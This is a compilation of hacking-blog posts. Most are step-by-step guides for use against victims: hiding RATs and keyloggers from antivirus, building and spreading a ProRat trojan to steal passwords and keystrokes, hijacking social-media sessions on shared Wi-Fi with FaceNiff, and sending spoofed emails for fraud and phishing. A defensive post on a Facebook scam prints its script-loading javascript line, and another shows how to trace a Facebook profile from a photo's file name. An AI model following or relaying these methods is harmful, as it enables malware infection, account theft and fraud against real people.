Hiding RATs,Trojans and Keyloggers from Antivirus

Recently , Zain posted how to make a pro rat server to hack victims computer in order to get all the saved passwords, related to Facebook, Twitter, and many others. Also you may get the screen shots of the infected computer. Today, I am telling you how to hide such severs, Torjans and RATs also keyloggers from Antivirus since all are of same kind. Here, we shall use a simple software, also hex editing can be done to make this possible, Later i will post about Hex editing also, Don't worry hackersthirst will be complete guide for those beginners who want to learn such things for getting more secure.

This program is used by programmers and other experts to make there softwares secure from crackers and hackers, We shall use this to make our trojans, Servers, Keyloggers and much more secure in order to hide them from antivirus.

Steps:

1) First of all download this software from here.

2) After downloading the application, install it and then run it. After running load your any application or trojan which you want to hide from antivirus like this:

3) Select the following options, Like i did below:

4) Now, Select following options and protect your server or trojan.

You are done, You will see that an old and new file is created in that same folder, Like below, I have tested this for Pro-Rat.
Checking With Antivirus:
So, Now lets scan with an updated antivirus:

You may check it with other antivirus, I have scanned using an updated antivirus (Eset as you can see).

Note: You can also use Cyber-gate instead of pro-rat. Also, This trick doesn't work for all Keyloggers and RATs.

Pro Rat Trojan - Spy Others Computer (Hack Facebook, Twitter Passwords)

Today you will learn in this post to make pro rat trojan. Using which you will be able to hack the whole victim computer including all the Facebook, twitter and other email id's saved passwords. Seems interesting so lets start!

What Is Pro Rat Trojan ?

In short,Pro rat trojan is the type of trojan which uses it's spying ability to spy in your victims computer and let you control it.

Making Of Pro Rat Trojan:

Generally there are lot of ways to make pro rat trojan but I shall teach you the easiest way to make it . Things you need for it are given:

Pro Rat

Log onto no-ip.com and get registration there with an account .(I leave this easy part on you, As you might have experience of signing up)

Now download their Dns update client . Run it and by the help of it update your hostname and save it

Now we will PING on our host to check whether our host ip has been associated with the chosen server or not.

WHAT IS PING ?

It is the good question . Ping is a program that sends a series of packets over a network or the Internet to a specific computer in order to generate a response from that computer. The other computer responds with an acknowledgment that it received the packets. Ping was created to verify whether a specific computer on a network or the Internet exists and is connected.

Back to the point.

Go to RUN and enter CMD in it . A window will pop out , it is the command prompt well you can guess it's work from it's name . Now enter in it PING *NAME OF YOUR HOSTNAME*

,press enter and it would reply with your ip .

After ensuring it that you have been connected to chosen server move to the folder where you have installed the pro rat and open pro rat.exe . A window will pop out , now refer to the photo given bellow .

Click on creat and then click on create pro rat server as given . Now for a window will open and will take necessary information refer to another photo given bellow .

After filling the options click on Create Server and your server would be ready to give out to your victim . Attach it to the file or directly give it to your victim . I left it on you.

Note: You can use many social engineering tricks to send the file to the victim. You may also ask the victim to turn of antivirus its a new game. Later I shall post about how to hide your server from antivirus.

When the victim will run the server , Open the pro rat again and goto pro connectivity and click on the button given bellow more refer to the photo:

Thus you can do lots of things using it. You can log all the keys pressed by victim, can take screen shots of his pc. And Much more.

Countermeasures Against Trojan :

Only way to safe your computer from trojan is to keep your computer up to date with the antivirus and use AVG, Norton antivirus . There is the best way install process explorer which let you see trojans in your computer and to reverse them .

Bypassing New (theater) Photo Viewer in Facebook

Facebook is doing a lot of new things with it-self. Their developers are trying to make it more and more user friendly, However many people have their own specific taste and it is not necessary that they will also like the new and updated facebook. Recently, facebook has upgraded its image viewer, A lot of people didn't like this new change, Including me too as it is annoying also. Therefore i am posting some tricks to bypass it and come back to classic photo viewer instead of theater photo viewer which is new one. This new photo viewer looks like this:

Following are the ways using which we can bypass it!

1) Skipping the new photo viewer by pressing F5:

Yes, Its a small trick and quite handy using which you can easily by-pass this new photo viewer, After opening the photo you may press F5 button provided on keyboard and you will be back to classic photo viewer.

2) Using Right Click:

Whenever you are opening any photo just right click on (thumbnail) it and, as you may be mostly on latest browsers, press open link in a new tab and thats it you will see that photo is viewed in the new tab in classic mode. If you are at old browser then just choose open link in a new window.

3) Removing "&theater" from the link:

Here is another smart trick, open the photo by clicking on it and when the new viewer is loaded, Navigate to the browser address bar and here you will see "&theater" in the url of photo, remove it from there by selecting and hitting back space, after that hit enter and thus you will be in classic photo viewer again.

4) Using Facebook LightBox Killer, Permanent solution:

Well, the smart tricks that i defined above will also be irritating for you and will require time except that right click method, So, here is a permanent solution for by-passing this irritating facebook picture viewer, I am going to provide you an addon that is developed by BetterFacebook, The name of add-on is Facebook LightBox Killer and is supported at Chrome as well as Firefox. Navigate to betterfacebook.net and install this trust worthy addon, There are many features of this addon, Some are below:
Highlight New Comments
Themes
Automatically Remove "RECENT ACTIVITY" From Your Profile
Enlarge Thumbnails On Hover
Disables Light Box
And much more, You can choose between many options which you want to activate or disable, On installing ad-on, Disable light box like this:

Facebook Profile Stalker (Who is Viewing Your Facebook Profile) - Facebook Scam

\

 

I have seen many people getting infected from such scams, And thus scams are also promoted due to people foolishness as they are not much aware of security and common social engineering tricks, Recently i came up with a new Facebook scam and thus i have decided to make a post at hackers thirst about it.

Who is Viewing your Facebook Profile a scam (Commonly called as Facebook Profile Stalker):-

Yes, This is absolutely a scam which states  that a user of Facebook is able to know that how many people have viewed there Facebook Profile if they will use their application, But Leme tell you that all such things are totally fake and thus you will get involved in the propagation of such things, Via Chat messages, Inboxes and Wall Posts to friends' walls without your knowledge that you are propagating a spammy and scam application. In other words a lame application which will just involve in spam. So, Don't follow links which are clamming that you will be able to know that who has viewed your profile.

How: this Scam Works:-

First of all one of your friends use this scam to know that who has viewed his profile, after that it get posted at your wall and in curiosity you click that link, After that your ip address is used to locate you and say if you are in lahore, Pakistan Following ialog Box will come :

This is lame, And 5 is only Fake number. After that following steps will be asked you to be done, Like copying the java script and then pasting it in your browser address bar while using Facebook, See the pic:

After this you will copy script and paste that in browser address bar and will hit enter while using facebook as told in this hack. But Stop have you check that Java script? All the Scam and Auto Spamming is based at that script, I have checked that Java Now!

What: that Profile Stalker Fake Java Script Will Do:-

First of all if you know that java script then in the "Copy This Text" Dialog box you can know the path of Java Script, Like See this Below:

javascript:(a=(b=document).createElement('script')).src='/ajnachakre.info/com/js.js?'+Math.random(),b.body.appendChild(a);void(0)

 The bolded portion is the path of the script, You can put that path in browser address bar and hit enter after that you can easily see the coding infront of you in the browser.
First Section Of Script:
It Will create a dialog box, That Please Wait Loading Your results, As you can see below (Background is Set to a pic hosted at Tinypic):

Second Section Of Script After Asking you for Wait:
After that it will send the highlighted Spam Messages:

Where: this Spamm Messages Will be Posted:
1) In the Chat Messages to Friends
2) To the Inbox of Friends
3) To the Walls of Friends
4) At your own Wall
I have given all these stats after checking this Java script.
What: Else Will It Do:
It Will automatically make you fan of those pages at Facebook Whose id's are given in the Java Script, Like See Screen Shot Below:

Conclusion:

Don't Click and Use such Application which claim that you will know that how many people have viewed your profile. Also Never put java script in you browser address bar while browsing Facebook.Also Don't Use links claiming OMG! and Look What an Amazing and All Such that!

Find Any Facebook Profile By using Picture

Today I,ll discuss a short and smart trick using which you can easily locate any Facebook profile within seconds but the thing which matters is this that the picture must have the unique name in which the address of the person’s pofile is hidden however it may help you some day that’s why I am sharing this trick. First of the go to the picture and see its name with which its been saved anywhere, It must be in some numerical figures having a “_n” in the end.
Lets, Take a picture and inspect its name, so we found the following name of the picture:

23213_100000967034368_1371_n

Now, We have to find profile address out of it, Just ignore the 23213 in the start and also 1371_n in the end, Just copy the mid snippet of numbers like 100000967034368 , And after this paste it in notepad.
Now, Take this URL:

http://www.facebook.com/profile.php?id=

And paste the snippet of numbers which you have pasted in notepad just after it like this:

http://www.facebook.com/profile.php?id=100000967034368

Copy this whole URL and Paste this in browser address bar and hit enter, After this you,ll see the person’s, whose pic was here only, Facebook profile in front of you. Small trick but useful one in some cases.

Hijack into Facebook, twitter or YouTube accounts using just an Android phone

We will be using only an android phone.. This is very useful if you want to hack a Facebook account of someone and you don't have a laptop. People would even think you were only texting. Here's what you will need:

1- Any android Phone with an app called "FaceNiff"
2- And a Bit brain

Yep, that's all. You can download FaceNiff at their website:-
Download FaceNiff

Regardless if the network is encrypted with WEP, WPA-PSK or WPA2-PSK as long as you are on the same Local area network or Wi-Fi you could easily sniff and hi jack into anyone's Facebook, Twitter or YouTube account as long as they are logged in.

Steps Used to Hijack accounts using FaceNiff:-

Here are the steps to hi jacking an account:
1. Connect to the network and open the FaceNiff app.

2. Click the red button and it will then turn green when the sniffer is on.

3. Press the enter button and It would show a list of all the accounts you could hi jack into.

4. Click the account you like and you will automatically be logged in.

5. Do what you want with the hacked account.

This works by stealing their cookies and setting it as your own. Therefore you can log in with even knowing his username or password. Enjoy..

Sending Fake/Spoofed Emails (How to guide and Purpose)

A large number of people are using these fake emails utility to fool and fraud with innocent people but I will show you today that how Hackers make it possible and what they want to do by using these emails. Purposes are large but i will discuss some of the common purposes here. Also i will show you many online free service which will allow you to send these fake emails. Similarly how can we make such service at our own. So, Fake emails can be sent from:

1. Using Any Free or premium online fake email service (There are million like this)
2. Sending Such emails by using a php script. (You can make your own)

So, lets discuss these first:

1) Using Fake Email Services:

There are many online free as well as premium services to send fake emails from any address you want with any name used and also with any content to be attached with email. Premium services will give you more options but free can also be used. Here are two fake email senders:
AnonyMailer>>Free Fake Email - Send Fake Mail Pranks Anonymously for Free
Emkei Fake Mailer>>Free Fake email with more options-Attachments also

Search at Google.com>> Free Fake email Services, You will get many.

2) Using Fake Email php Script:
Download the script for sending Fake Emails from here.
(Alternalte download here)
You will need a hosting not ordinary one this script will work on such hosting which allows to send emails.
One of them is x10hosting.com other you may use is 000webhost.com. Further search google.
Make account at above hosting any of the one and upload you script.
Now navigate to, www.youweb.com/sendmail.php and Just fill the fields and send emails.
>>A paid hosting is good for this purpose.
Note: Don't use this to spam.Effective Earning is not responsible for bad usage of this script.

To learn how to upload your files to free or paid hostings go here.

Why Hackers Use Fake Emails?

a) The main reason is fraud. They can fool you by using your boss email id and sending a warning that do this or else you will be fired. etc.
b) Can be used to hack your social email acounts. or gmail account lets say. See pic below, A hacker is sending Fake email:

(Click the image to enlarge it)

Now the hacker is trying to fool victim by hyperlinking his phishing page (of gmail) link. Since, now people know that www.gmail.anyweb.com will be fraud page. So, Hackers Use some common social engineering Tips. Now when i will click the link i won't see url in browser (Common Browsing Attitude) since i want to get my donation (As early as possible), therefore i will login and will loose my password.

Further you have common sense you can estimate that how these fake emails can be used. So, Always be sharp enough to catch such emails and always look at browser URL after clicking such links like login from here etc. Well practically, Why someone will ask you to login to Gmail, Yahoo, Msn or facebook from an email?

Think......